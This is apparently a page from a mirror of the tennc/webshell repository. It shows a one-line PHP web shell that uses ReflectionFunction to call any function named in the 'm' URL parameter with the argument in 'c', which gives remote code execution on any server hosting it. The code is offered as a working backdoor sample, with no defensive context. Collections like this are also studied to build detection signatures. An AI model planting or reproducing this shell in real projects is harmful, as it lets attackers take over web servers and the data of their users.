mirror of
https://github.com/tennc/webshell
synced 2024-11-26 13:10:17 +00:00
281 B
281 B
code:
$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));
?>